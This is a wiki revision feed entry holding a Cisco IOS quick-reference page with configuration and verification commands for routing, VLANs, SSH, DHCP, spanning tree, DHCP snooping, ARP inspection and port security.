== Route Summarization ==&lt;br /&gt;
&lt;br /&gt;
Route summarization (aggregation) reduces routing table size by advertising one route that represents multiple networks.&lt;br /&gt;
&lt;br /&gt;
Example networks:&lt;br /&gt;
 192.168.0.0/24&lt;br /&gt;
 192.168.1.0/24&lt;br /&gt;
 192.168.2.0/24&lt;br /&gt;
 192.168.3.0/24&lt;br /&gt;
&lt;br /&gt;
Can be summarized as:&lt;br /&gt;
 192.168.0.0/22&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure Manual Summarization (EIGRP) ===&lt;br /&gt;
Applied on the outgoing interface.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0&lt;br /&gt;
  ip summary-address eigrp 100 192.168.0.0 255.255.252.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure Manual Summarization (OSPF ABR) ===&lt;br /&gt;
Configured under the OSPF process (on an ABR).&lt;br /&gt;
&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  area 0 range 192.168.0.0 255.255.252.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Show Routing Information ==&lt;br /&gt;
&lt;br /&gt;
=== View Routing Table ===&lt;br /&gt;
&lt;br /&gt;
 show ip route&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== View Specific Route ===&lt;br /&gt;
&lt;br /&gt;
 show ip route 192.168.1.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== View Routing Protocol Information ===&lt;br /&gt;
&lt;br /&gt;
 show ip protocols&lt;/div&gt;</summary>
		<author><name>50.220.241.211</name></author>
	</entry>
	<entry>
		<id>https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1124</id>
		<title>Cisco Commands</title>
		<link rel="alternate" type="text/html" href="https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1124"/>
		<updated>2026-02-23T22:42:30Z</updated>

		<summary type="html">&lt;p&gt;50.220.241.211: /* Administrative Distance */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Cisco IOS Command Reference =&lt;br /&gt;
&lt;br /&gt;
A quick-reference guide for common Cisco IOS commands on switches and routers.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Device &amp;amp; System Information ==&lt;br /&gt;
&lt;br /&gt;
=== Show MAC Address Table ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show mac address-table&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show OS and Device Version ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show version&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Logged-in Users ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show users&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Files ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
dir&lt;br /&gt;
dir nvram:&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Configuration Files ==&lt;br /&gt;
&lt;br /&gt;
=== Show Configurations ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show running-config&lt;br /&gt;
show startup-config&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Interface Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show run interface g0/0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Filter Running Config (grep-like) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show run | include {searchterm}&lt;br /&gt;
show run | exclude {searchterm}&lt;br /&gt;
show run | begin {searchterm}&lt;br /&gt;
show run | section {section-name}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Save Running Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
copy running-config startup-config&lt;br /&gt;
copy run start&lt;br /&gt;
wr&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== User Privileges &amp;amp; Security ==&lt;br /&gt;
&lt;br /&gt;
=== Enter Privileged Mode (&amp;quot;elevate to root&amp;quot;) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
enable&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Encrypted Enable Password ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
enable secret ThisisaSecret&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Encrypt Plaintext Passwords (Weak Encryption)  ===&lt;br /&gt;
You can decrypt these with publicly available tools like https://keydecryptor.com/decryption-tools/cisco7&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
service password-encryption&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface &amp;amp; Network Status ==&lt;br /&gt;
&lt;br /&gt;
=== Interface IP Summary ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip interface brief&lt;br /&gt;
show ipv6 interface brief&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Interface IP Summary (filtered to only interfaces with IPs) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip interface brief | exclude unassigned&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
== VLAN &amp;amp; Switching ==&lt;br /&gt;
&lt;br /&gt;
=== Show VLANs ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show vlan brief&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Interface VLAN Details ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show interface g0/1 switchport&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Trunk Interfaces ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show int trunk&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Clear Tables ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
clear mac address-table&lt;br /&gt;
clear arp-cache&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Telnet &amp;amp; Remote Access ==&lt;br /&gt;
&lt;br /&gt;
=== Connect via Telnet ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
connect {DeviceName}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Hosts &amp;amp; Sessions ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show hosts&lt;br /&gt;
show sessions&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Disconnect Session ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
disconnect {DeviceName}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Suspend Active Session ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Ctrl+Shift+6, then x&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== SSH Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Basic SSH Setup ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip domain-name cisco.com&lt;br /&gt;
crypto key generate rsa&lt;br /&gt;
ip ssh version 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Remove RSA Keys ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
crypto key zeroize rsa&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Create Local User ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
username admin secret ccna&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Default Gateway (switch) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip default-gateway 192.168.10.1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Enable SSH on VTY Lines ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line vty 0 15&lt;br /&gt;
 transport input ssh&lt;br /&gt;
 login local&lt;br /&gt;
 exit&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Global Configuration Mode ==&lt;br /&gt;
&lt;br /&gt;
=== Enter Global Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
configure terminal&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Disable DNS Lookup on Typos ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no ip domain-lookup&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set MOTD Banner ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
banner motd MESSAGEHERE&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Hostname ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
hostname HOSTNAME&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Line Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Console Line ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line con 0&lt;br /&gt;
 password itsasecret&lt;br /&gt;
 login&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== VTY Lines ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line vty 0 15&lt;br /&gt;
 password itsasecret&lt;br /&gt;
 login&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Interface Selection ===&lt;br /&gt;
 interface vlan 1&lt;br /&gt;
 interface fa0/1&lt;br /&gt;
 interface range fa0/2-3&lt;br /&gt;
 interface range fa0/2-3,g0/1&lt;br /&gt;
&lt;br /&gt;
=== Enable Interface ===&lt;br /&gt;
 no shutdown&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv4 Address ===&lt;br /&gt;
 ip address 192.168.0.1 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv4 Default Gateway (Switch) ===&lt;br /&gt;
 ip default-gateway 192.168.0.254&lt;br /&gt;
&lt;br /&gt;
== Interface IPv6 Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv6 Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Assign Link-Local Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 address fe80::1 link-local&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Remove IPv6 Addresses ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
no ipv6 address&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== IPv6 ND Other-Config Flag ===&lt;br /&gt;
Set the &amp;quot;Other Configuration&amp;quot; flag in IPv6 Neighbor Discovery (ND) messages. &lt;br /&gt;
- When enabled, it signals to IPv6 hosts that they should obtain additional configuration information (such as DNS server addresses) via DHCPv6, even if they have a stateless autoconfigured address.&lt;br /&gt;
&lt;br /&gt;
 ipv6 nd other-config-flag&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== VLAN Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Create / Configure VLAN ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
vlan 10&lt;br /&gt;
 name MyAwesomeVlan&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Access / Trunk Switchport Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Access Port ===&lt;br /&gt;
Configures the interface as an access port and assigns it to VLAN 10.&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Trunk Port ===&lt;br /&gt;
Configures the interface as a trunk port using 802.1Q encapsulation.&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=== Trunk Allowed VLANs ===&lt;br /&gt;
Specifies which VLANs are allowed to traverse the trunk link.&lt;br /&gt;
 switchport trunk allowed vlan 10,20,33,99&lt;br /&gt;
&lt;br /&gt;
=== Trunk Native VLANs ===&lt;br /&gt;
Sets the native VLAN for untagged traffic on the trunk.&lt;br /&gt;
 switchport trunk native vlan 99&lt;br /&gt;
&lt;br /&gt;
=== Trunk Nonegotiate ===&lt;br /&gt;
Disables DTP (Dynamic Trunking Protocol) negotiation on the trunk interface.&lt;br /&gt;
 switchport nonegotiate&lt;br /&gt;
&lt;br /&gt;
== EtherChannel Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Create EtherChannel (LACP Active) ===&lt;br /&gt;
Configures interfaces to actively negotiate EtherChannel using LACP.&lt;br /&gt;
 interface range g0/1 - 2&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
&lt;br /&gt;
=== Create EtherChannel (LACP Passive) ===&lt;br /&gt;
Configures interfaces to respond to LACP negotiation.&lt;br /&gt;
 interface range g0/1 - 2&lt;br /&gt;
  channel-group 1 mode passive&lt;br /&gt;
&lt;br /&gt;
=== Create EtherChannel (On Mode) ===&lt;br /&gt;
Forces EtherChannel without negotiation protocol.&lt;br /&gt;
 interface range g0/1 - 2&lt;br /&gt;
  channel-group 1 mode on&lt;br /&gt;
&lt;br /&gt;
=== Configure Port-Channel as Access Port ===&lt;br /&gt;
Applies access configuration to the logical Port-Channel interface.&lt;br /&gt;
 interface port-channel 1&lt;br /&gt;
  switchport mode access&lt;br /&gt;
  switchport access vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Configure Port-Channel as Trunk ===&lt;br /&gt;
Applies trunk configuration to the logical Port-Channel interface.&lt;br /&gt;
 interface port-channel 1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=== Verify EtherChannel ===&lt;br /&gt;
Displays EtherChannel status and summary information.&lt;br /&gt;
 show etherchannel summary&lt;br /&gt;
&lt;br /&gt;
=== Verify Port-Channel Interface ===&lt;br /&gt;
Displays detailed information about the Port-Channel interface.&lt;br /&gt;
 show interfaces port-channel 1&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== DHCP ==&lt;br /&gt;
&lt;br /&gt;
=== Configure a DHCP Server on a Cisco Router ===&lt;br /&gt;
Assigns IP addresses automatically to clients on a network.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip dhcp excluded-address 192.168.1.1 192.168.1.10&lt;br /&gt;
! Exclude addresses that should not be assigned dynamically&lt;br /&gt;
&lt;br /&gt;
ip dhcp pool LAN_POOL&lt;br /&gt;
 network 192.168.1.0 255.255.255.0&lt;br /&gt;
 default-router 192.168.1.1&lt;br /&gt;
 dns-server 8.8.8.8 8.8.4.4&lt;br /&gt;
 lease 7&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;excluded-address&#039;&#039;: Prevents certain IPs from being assigned (like static IPs for servers or routers).  &lt;br /&gt;
* &#039;&#039;network&#039;&#039;: Defines the subnet for DHCP clients.  &lt;br /&gt;
* &#039;&#039;default-router&#039;&#039;: Sets the gateway IP for clients.  &lt;br /&gt;
* &#039;&#039;dns-server&#039;&#039;: Specifies DNS servers for clients.  &lt;br /&gt;
* &#039;&#039;lease&#039;&#039;: Duration the IP is valid (in days).  &lt;br /&gt;
&lt;br /&gt;
=== Configure DHCP Relay (IP Helper) ===&lt;br /&gt;
Forwards DHCP requests from clients to a remote DHCP server.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
interface GigabitEthernet0/1&lt;br /&gt;
 ip address 192.168.1.1 255.255.255.0&lt;br /&gt;
 ip helper-address 192.168.2.100&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;ip helper-address&#039;&#039;: IP of the DHCP server to forward requests to.  &lt;br /&gt;
* Needed when the server is on a different subnet.  &lt;br /&gt;
&lt;br /&gt;
=== Verify DHCP Status ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip dhcp binding      ! Shows assigned IP addresses&lt;br /&gt;
show ip dhcp pool         ! Shows pool usage and statistics&lt;br /&gt;
show running-config       ! Check DHCP configuration&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Best Practices ===&lt;br /&gt;
* Exclude static IP addresses from DHCP pools.  &lt;br /&gt;
* Use &#039;&#039;DHCP relay&#039;&#039; when clients and server are on different subnets.  &lt;br /&gt;
* Monitor DHCP bindings to prevent IP conflicts.&lt;br /&gt;
&lt;br /&gt;
== Spanning Tree ==&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast on an interface ===&lt;br /&gt;
Use PortFast on edge/access ports that connect to end devices.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast globally ===&lt;br /&gt;
Enables PortFast on all access ports.&lt;br /&gt;
&lt;br /&gt;
 spanning-tree portfast default&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast on a trunk (use with caution) ===&lt;br /&gt;
Only use when the trunk connects to a single end device (not another switch).&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast trunk&lt;br /&gt;
&lt;br /&gt;
=== Verify PortFast status ===&lt;br /&gt;
&lt;br /&gt;
 show spanning-tree interface GigabitEthernet0/1 detail&lt;br /&gt;
&lt;br /&gt;
=== Disable PortFast on an interface ===&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  no spanning-tree portfast&lt;br /&gt;
&lt;br /&gt;
=== Best Practice: Enable BPDU Guard with PortFast ===&lt;br /&gt;
Shuts down the port if a BPDU is received, protecting against loops.&lt;br /&gt;
&lt;br /&gt;
Per interface:&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast&lt;br /&gt;
  spanning-tree bpduguard enable&lt;br /&gt;
&lt;br /&gt;
Globally:&lt;br /&gt;
 spanning-tree portfast default&lt;br /&gt;
 spanning-tree bpduguard default&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Do &#039;&#039;&#039;not&#039;&#039;&#039; enable PortFast on ports connected to other switches&lt;br /&gt;
* Recommended for access/edge ports&lt;br /&gt;
* Incorrect use can cause Layer 2 loops&lt;br /&gt;
&lt;br /&gt;
== DHCP Snooping ==&lt;br /&gt;
&lt;br /&gt;
=== Enable DHCP Snooping globally ===&lt;br /&gt;
Enable DHCP Snooping for the switch.&lt;br /&gt;
&lt;br /&gt;
 ip dhcp snooping&lt;br /&gt;
&lt;br /&gt;
=== Enable DHCP Snooping on a VLAN ===&lt;br /&gt;
DHCP Snooping only operates on specified VLANs.&lt;br /&gt;
&lt;br /&gt;
 ip dhcp snooping vlan 10&lt;br /&gt;
 ip dhcp snooping vlan 20&lt;br /&gt;
&lt;br /&gt;
=== Configure trusted interfaces ===&lt;br /&gt;
Mark uplinks or ports connected to legitimate DHCP servers as trusted.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  ip dhcp snooping trust&lt;br /&gt;
&lt;br /&gt;
=== Untrusted interfaces (default) ===&lt;br /&gt;
Access ports are untrusted by default. DHCP server responses are blocked.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  no ip dhcp snooping trust&lt;br /&gt;
&lt;br /&gt;
=== Configure DHCP Snooping rate limiting ===&lt;br /&gt;
Protect against DHCP starvation attacks. Limits to 15 DHCP packets per second, will mark port as violating otherwise.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  ip dhcp snooping limit rate 15&lt;br /&gt;
&lt;br /&gt;
=== Verify DHCP Snooping status ===&lt;br /&gt;
&lt;br /&gt;
 show ip dhcp snooping&lt;br /&gt;
 show ip dhcp snooping binding&lt;br /&gt;
&lt;br /&gt;
=== Disable DHCP Snooping ===&lt;br /&gt;
&lt;br /&gt;
 no ip dhcp snooping&lt;br /&gt;
 no ip dhcp snooping vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Only trusted ports can send DHCP server messages&lt;br /&gt;
* Access ports should remain untrusted&lt;br /&gt;
* Commonly used with &#039;&#039;&#039;Dynamic ARP Inspection&#039;&#039;&#039; and &#039;&#039;&#039;IP Source Guard&#039;&#039;&#039;&lt;br /&gt;
* Requires correct VLAN configuration to function properly&lt;br /&gt;
&lt;br /&gt;
== Dynamic ARP Inspection (DAI) ==&lt;br /&gt;
Dynamic ARP Inspection (DAI) is a security feature that validates ARP packets against a trusted database (typically built by DHCP Snooping) to prevent ARP spoofing and man-in-the-middle attacks. It intercepts ARP packets on untrusted ports, checks IP-to-MAC bindings, and drops invalid ones.&lt;br /&gt;
&lt;br /&gt;
=== Enable DAI globally ===&lt;br /&gt;
Dynamic ARP Inspection requires DHCP Snooping to be enabled first (DAI uses the DHCP snooping binding table for validation).&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection&lt;br /&gt;
&lt;br /&gt;
=== Enable DAI on a VLAN ===&lt;br /&gt;
Specify which VLANs should be protected.&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection vlan 10&lt;br /&gt;
 ip arp inspection vlan 20&lt;br /&gt;
 ip arp inspection vlan 10,20   (alternative: range)&lt;br /&gt;
&lt;br /&gt;
=== Configure trusted interfaces ===&lt;br /&gt;
Trust uplinks and ports connected to other switches, routers, DHCP servers, or devices that should bypass DAI checks.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  ip arp inspection trust&lt;br /&gt;
&lt;br /&gt;
Trusted ports forward ARP packets without validation.&lt;br /&gt;
&lt;br /&gt;
=== Untrusted interfaces (default) ===&lt;br /&gt;
Access ports are untrusted by default. Invalid ARP packets are dropped.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  no ip arp inspection trust   (optional; this is the default)&lt;br /&gt;
&lt;br /&gt;
=== Configure ARP rate limiting ===&lt;br /&gt;
Protect against ARP flooding/DoS attacks. Default is 15 pps on untrusted ports (exceeding this can put the port in err-disable).&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  ip arp inspection limit rate 15   (example: 15 packets per second)&lt;br /&gt;
  ip arp inspection limit rate 100 burst interval 1   (optional: higher rate with burst)&lt;br /&gt;
&lt;br /&gt;
=== Additional Validation Checks ===&lt;br /&gt;
By default, DAI validates only IP-to-MAC bindings from the DHCP snooping database. Enable extra checks (global config mode) to catch malformed ARP packets (highly recommended for stronger security).&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection validate src-mac&lt;br /&gt;
 ip arp inspection validate src-mac dst-mac ip   (common: enable all three)&lt;br /&gt;
&lt;br /&gt;
Options:&lt;br /&gt;
* &#039;&#039;&#039;src-mac&#039;&#039;&#039; — Checks source MAC in Ethernet header vs. sender MAC in ARP body (for requests and replies).&lt;br /&gt;
* &#039;&#039;&#039;dst-mac&#039;&#039;&#039; — Checks destination MAC in Ethernet header vs. target MAC in ARP body (mainly for replies).&lt;br /&gt;
* &#039;&#039;&#039;ip&#039;&#039;&#039; — Checks for invalid/unexpected IP addresses (e.g., 0.0.0.0, 255.255.255.255, multicast IPs) in ARP body.&lt;br /&gt;
&lt;br /&gt;
Each new &amp;lt;code&amp;gt;ip arp inspection validate&amp;lt;/code&amp;gt; command &#039;&#039;&#039;overrides&#039;&#039;&#039; previous ones, so specify all desired options together.&lt;br /&gt;
&lt;br /&gt;
To disable: &amp;lt;code&amp;gt;no ip arp inspection validate [src-mac] [dst-mac] [ip]&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Verify DAI status ===&lt;br /&gt;
 show ip arp inspection&lt;br /&gt;
 show ip arp inspection vlan 10&lt;br /&gt;
 show ip arp inspection interfaces&lt;br /&gt;
 show ip arp inspection statistics   (shows drops, rate limit violations)&lt;br /&gt;
 show ip arp inspection log   (logs of dropped packets)&lt;br /&gt;
&lt;br /&gt;
=== Disable DAI ===&lt;br /&gt;
 no ip arp inspection&lt;br /&gt;
 no ip arp inspection vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Requires &#039;&#039;&#039;DHCP Snooping&#039;&#039;&#039; to build the ARP binding table (enable with &amp;lt;code&amp;gt;ip dhcp snooping&amp;lt;/code&amp;gt; + &amp;lt;code&amp;gt;ip dhcp snooping vlan ...&amp;lt;/code&amp;gt;).&lt;br /&gt;
* Only trusted ports can send unlimited ARP replies/packets (no validation or rate limiting).&lt;br /&gt;
* Access ports should remain &#039;&#039;&#039;untrusted&#039;&#039;&#039; to enforce checks.&lt;br /&gt;
* Commonly deployed with &#039;&#039;&#039;PortFast + BPDU Guard&#039;&#039;&#039; on access ports for loop/spanning-tree protection.&lt;br /&gt;
* For non-DHCP environments, use static ARP ACLs: &amp;lt;code&amp;gt;ip arp inspection filter arp-acl-name vlan 10&amp;lt;/code&amp;gt;.&lt;br /&gt;
* Often combined with &#039;&#039;&#039;IP Source Guard&#039;&#039;&#039; (&amp;lt;code&amp;gt;ip verify source&amp;lt;/code&amp;gt;) on access ports to filter IP traffic based on the same bindings.&lt;br /&gt;
* Rate limiting helps prevent DoS; monitor with &amp;lt;code&amp;gt;show ip arp inspection statistics&amp;lt;/code&amp;gt; and consider &amp;lt;code&amp;gt;errdisable recovery cause arp-inspection&amp;lt;/code&amp;gt; for automatic port recovery.&lt;br /&gt;
* Additional validation (&amp;lt;code&amp;gt;src-mac&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;dst-mac&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;ip&amp;lt;/code&amp;gt;) catches MAC spoofing or malformed packets beyond basic binding checks—enable at least &amp;lt;code&amp;gt;src-mac&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;ip&amp;lt;/code&amp;gt; in most production setups.&lt;br /&gt;
* DAI is ingress-only (checks incoming packets on untrusted ports).&lt;br /&gt;
&lt;br /&gt;
== Port Security ==&lt;br /&gt;
&lt;br /&gt;
=== View status of port security on an interface ===&lt;br /&gt;
 show port-security interface f0/1&lt;br /&gt;
&lt;br /&gt;
=== Activate Port Security on an interface ===&lt;br /&gt;
The port cannot be a dynamic port:&lt;br /&gt;
 switchport mode access&lt;br /&gt;
Enable Port Security&lt;br /&gt;
 switchport port-security&lt;br /&gt;
&lt;br /&gt;
=== Set the maximum number of mac addresses that can be used on that port ===&lt;br /&gt;
 switchport port-security maximum 1&lt;br /&gt;
&lt;br /&gt;
=== Whitelist a specific mac address ===&lt;br /&gt;
 switchport port-security mac-address 0001.6311.E7BC&lt;br /&gt;
&lt;br /&gt;
=== Enable sticky mode to automatically learn mac addresses ===&lt;br /&gt;
 switchport port-security mac-address sticky&lt;br /&gt;
&lt;br /&gt;
=== Port Security Violation Modes ===&lt;br /&gt;
==== Protect ====&lt;br /&gt;
Silently drops packets from unknown MAC addresses while keeping the port up and generating no alerts.&lt;br /&gt;
 switchport port-security violation protect&lt;br /&gt;
&lt;br /&gt;
==== Restrict ====&lt;br /&gt;
Drops packets from unknown MAC addresses and logs the violation while incrementing the security counter.&lt;br /&gt;
 switchport port-security violation restrict&lt;br /&gt;
&lt;br /&gt;
==== Shutdown ====&lt;br /&gt;
Immediately disables the port when an unknown MAC address is detected, placing it into an error-disabled state.&lt;br /&gt;
 switchport port-security violation shutdown&lt;br /&gt;
